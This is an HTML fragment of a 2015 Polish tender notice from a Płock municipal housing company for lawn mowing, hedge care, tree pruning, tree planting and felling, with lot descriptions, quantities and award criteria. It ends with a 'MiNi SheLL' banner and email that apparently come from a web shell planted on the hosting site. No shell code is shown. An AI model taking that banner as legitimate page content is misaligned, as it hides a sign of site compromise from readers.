<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: powierzchni terenu zielonego przeznaczonego do koszenia trawy oraz zmian ilości mb żywopłotu do cięcia, zmian ilości mb odchwaszczania żywopłotów, zmian ilości m2 odchwaszczania rabat, z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, a także potrzeb Zamawiającego wynikających m.in. z właściwości przyrody (tempo wzrostu roślin, itp.). W tym zakresie Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego i rzeczowego dotyczy Części I, powierzchni terenu zielonego przeznaczonego do koszenia trawy oraz zmian ilości mb żywopłotu do cięcia, zmian ilości mb odchwaszczania żywopłotów, zmian ilości m2 odchwaszczania rabat z powodu ograniczenia lub zmiany powierzchni administrowanych terenów dotyczy Części I. zakresu ilościowego i rzeczowego drzew oraz  wprowadzenia zamiennych gatunków drzew, z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych  dotyczy Części II.
zakresu ilościowego i rzeczowego drzew oraz  wprowadzenia zamiennych gatunków drzew, z powodu ograniczenia lub zmiany powierzchni administrowanych terenów dotyczy Części II. zakresu ilościowego drzew z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych  dotyczy Części III zakresu ilościowego drzew z powodu ograniczenia lub zmiany powierzchni administrowanych terenów dotyczy Części III. Zamawiający pisemnie zawiadomi Wykonawcę z  7 dniowym wyprzedzeniem o powyższych zmianach . wynagrodzenia w przypadku ustawowej zmiany wysokości podatki VAT na warunkach określonych   w umowie. terminu realizacji przedmiotu umowy ze względu na: a)	zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych, które mogą być spowodowane użyciem ich przez wykonawcę, b)	zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki. na warunkach określonych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgm-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock p. nr 32 pn.pt w godz. 7:30 - 15:30 po uiszczeniu opłaty za jej wydanie w kwocie 27,68 zł brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 09:30, miejsce: Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. ul. Polna 7, 09-400 Płock, Kancelaria p. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KOSZENIE TRAWY, CIĘCIE I ODCHWASZCZANIE ŻYWOPŁOTÓW, ODCHWASZCZANIE RABAT I TRAWNIKÓW WOKÓŁ NICH..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace wykonywane będą na terenach stanowiących własność i współwłasność Gminy - Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej TBS Sp. z o. o. w Płocku  Rejon Obsługi Mieszkańców Nr III, IV , V. Termin realizacji zamówienia od dnia podpisania umowy do dnia  10.11.2015 r.
ZAKRES ZADANIA CZĘŚĆ I: KOSZENIE TRAWY, CIĘCIE I ODCHWASZCZANIE ŻYWOPŁOTÓW, ODCHWASZCZANIE RABAT I TRAWNIKÓW WOKÓŁ NICH. 1.Utrzymanie trawników , koszenie trawy wraz z uprzątnięciem i załadowaniem do podstawionego pojemnika/kontenera na odpady zielone, łącznie do 892.550,00 m2, po uzgodnieniu z Zamawiającym w zależności od wzrostu trawy.  2.Pielęgnacja żywopłotów , cięcie i odchwaszczanie żywopłotów wraz z uprzątnięciem                      i załadowaniem do podstawionego pojemnika/kontenera na odpady zielone, łącznie: cięcie żywopłotów: do  20.705,00 mb, odchwaszczanie żywopłotów: do  20.705,00 mb
 po uzgodnieniu z Zamawiającym w zależności od wzrostu żywopłotu oraz chwastów. 3. Pielęgnacja rabat, odchwaszczanie rabat i trawników wokół nich wraz z uprzątnięciem                     i załadowaniem do podstawionego pojemnika/kontenera na odpady zielone, łącznie do 10.555,00 m2, po uzgodnieniu z Zamawiającym w zależności od wzrostu chwastów.
UWAGA:Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu co najmniej na 2 dni przed terminem rozpoczęcia prac w zakresie utrzymania trawników i pielęgnacji rabat oraz pielęgnacji żywopłotów, konieczności zamówienia pojemników/kontenerów na odpady zielone ze wskazaniem miejsc oraz szczegółowych terminów ich podstawienia. Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu. Powierzchnie trawników, rabat oraz długości żywopłotów zostaną każdorazowo określone przez Zamawiającego w zleceniu. Zamawiający zastrzega sobie prawo do zmian powierzchni terenu zielonego przeznaczonego do koszenia trawy oraz zmian ilości mb żywopłotu do cięcia, zmian ilości mb odchwaszczania żywopłotów, zmian ilości m2 odchwaszczania rabat, z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, a także potrzeb Zamawiającego wynikających m.in. z właściwości przyrody (tempo wzrostu roślin, itp). W tym zakresie Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego i rzeczowego. Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Do wykonywania robót związanych z cięciem trawy i żywopłotów należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ Wykonanie i odbiór robót zgodnie ze SPECYFIKACJĄ TECHNICZNĄ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW ORAZ NASADZENIA DRZEW..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAKRES ZADANIA   CZĘŚĆ II: CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW ORAZ NASADZENIA DRZEW. 1.Cięcia pielęgnacyjne (cięcia prześwietlające, sanitarne, korygujące, odmładzające i formujące) i cięcia techniczne (cięcia techniczne wzdłuż ciągów komunikacyjnych, w energetyce i telekomunikacji, w budownictwie) w koronie drzew. 2.Nasadzenia drzew w ramach rekompensaty za usunięte drzewa, na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska - Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. UWAGA: KORONA DRZEW POWINNA BYĆ UFORMOWANA NA WYSOKOŚCI: 2,20 DO 2,50 M. 3.Dokonanie nasadzeń drzew - sposób rozliczania nasadzeń  wg katalogu KNR Nr 2) 21 Tereny zieleni MGPiB 2005 r. Materiał do nasadzeń powinien odpowiadać normie: PN)R)87023 Materiał szkółkarski. Ozdobne drzewa i krzewy liściaste oraz PN )R-65022 Materiał siewny. Nasiona roślin rolniczych. Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: a) Cięcia pielęgnacyjne i techniczne w koronie drzew do 52 szt. b) Nasadzenia drzew do 67 szt. c)Uprzątnięcie, wywóz i utylizacja odpadów powstałych w wyniku wykonywania prac wymienionych w punkcie a),b).
UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji  lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie.Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu.Ilości i gatunki drzew zostaną każdorazowo określone przez Zamawiającego w zleceniu.Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części II zamówienia.
Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty.Wykonawca udzieli co najmniej 1 roku okresu gwarancji na przedmiotowe zadanie. Do wykonywania robót związanych z cięciem pielęgnacyjnym i cięciem technicznym w koronie drzew oraz nasadzeniem drzew należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT Załącznik             nr 9 do SIWZ
Wykonanie i odbiór robót zgodnie ze SPECYFIKACJĄ TECHNICZNĄ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ. WYKAZ GATUNKÓW I ODMIAN DRZEW DO NASADZENIA WRAZ Z DANYMI TECHNICZNYMI :  Nazwy gatunku, odmiany: Głóg pośredni (Paul s Scarlett)obwód pnia mierzony na wysokości 100 cm min.16-18 cm szt.12 Klon pospolity  (Royal Red)obwód pnia mierzony na wysokości 100 cmmin.16 - 18 cm szt. 2, Klon kulisty
obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 14, Robinia akacjowa (Umbraculifera)
obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 3, Grusza drobnolistna (Chanticleer)
obwód pnia mierzony na wysokości 100 cmmin.16 - 18 cm szt. 16, Wiśnia kanzan obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 2,Brzoza Doorembos obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt.4, Lipa drobnolistna (Greenspire) obwód pnia mierzony na wysokości 100 cm min.16 cm - 18 cm szt. 5, Jarząb pospolity  obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 9. Razem 67 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAKRES ZADANIA CZĘŚĆ III: WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH. 1. Wycinka drzew oraz frezowanie karp korzeniowych wg potrzeb zgłaszanych przez Rejony Obsługi Mieszkańców. 2.Wycinka drzew na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. 3. Wyrównanie terenu, a w razie konieczności uzupełnienie ubytków ziemią i jej ubicie wraz z uprzątnięciem, wywiezieniem i utylizacją odpadów powstałych w wyniku wykonywania prac wymienionych w punkcie 1.  Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: Wycinka drzew ok. 49 sztuk, Frezowanie karp korzeniowych  ok. 49 sztuk  UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie. Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu.Wykonawca udzieli co najmniej 1 roku okresu gwarancji na przedmiotowe zadanie. Ilości i gatunki drzew zostaną każdorazowo określone przez Zamawiającego w zleceniu. Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części III zamówienia.Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Do wykonywania robót związanych z usunięciem drzew  należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT  Załącznik nr 9 do SIWZ Wykonanie i odbiór robót zgodnie ze SPECYFIKACJĄ TECHNICZNĄ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com